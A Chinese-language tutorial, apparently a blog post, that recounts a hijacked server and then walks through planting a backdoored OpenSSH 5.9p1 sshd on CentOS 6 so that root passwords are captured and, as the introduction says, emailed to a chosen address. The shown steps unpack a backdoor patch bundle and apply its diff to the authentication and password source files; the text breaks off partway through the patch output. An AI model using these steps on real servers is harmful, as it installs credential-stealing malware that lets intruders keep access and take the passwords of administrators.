记一次服务器被当作肉鸡,服务器再一次被黑后,没有发生任何意外,管理员也就没当回事,没有太在意,也紧急修改了密码,但是过段时间后,服务器经常性的CPU飙高,总是会有一些莫名进程占用内存,杀掉进程,修改登录密码,发现过段时间后,还会出现这种情况,这是因为sshd已被修改,有后门,无论你怎样修改密码,黑客都会收到你的用户名和密码。今天,我们模拟劫持root密码并自动发送到指定邮箱
准备环境:Centos 6
需要用到的资源(可下载):
0x06-openssh-5.9p1.patch.tar.gz
-link
openssh-5.9p1.tar.gz
-link
inotify-tools-3.13.zip
-link
模拟劫持 Root 密码
记录正常的 ssh 版本
[root@Fp-01 ~]# ssh -v
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
上传所需的资源到服务器
[root@Fp-01 tmp]# ll
total 1492
-rw-r--r--. 1 root root 3700 Feb 14 10:31 0x06-openssh-5.9p1.patch.tar.gz
-rw-r--r--. 1 root root 412946 Feb 14 10:31 inotify-tools-3.13.zip
-rw-r--r--. 1 root root 1110014 Feb 14 10:31 openssh-5.9p1.tar.gz
先解压 0x06-openssh、openssh,为接下来的打补丁做准备
[root@Fp-01 tmp]# tar -zxf 0x06-openssh-5.9p1.patch.tar.gz
[root@Fp-01 tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz
openssh-5.9p1.patch/
openssh-5.9p1.patch/LICENSE
openssh-5.9p1.patch/INSTALL
openssh-5.9p1.patch/README
openssh-5.9p1.patch/sshbd5.9p1.diff
openssh-5.9p1.patch/ssh_integrity_checker.sh
开始打补丁
先将补丁文件放入 openssl 目录下
[root@Fp-01 tmp]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
[root@Fp-01 tmp]# cd openssh-5.9p1
打补丁:替代原来的文件
[root@Fp-01 openssh-5.9p1]# patch < sshbd5.9p1.diff
patching file auth.c # 认证
patching file auth-pam.c # 认证
patching file auth-passwd.c # 认证
patching file canohost.c
patching file includes.h # 密码宝典
patching file log.c
patching file servconf.c # sshd 服务端
patching file sshconnect2.c #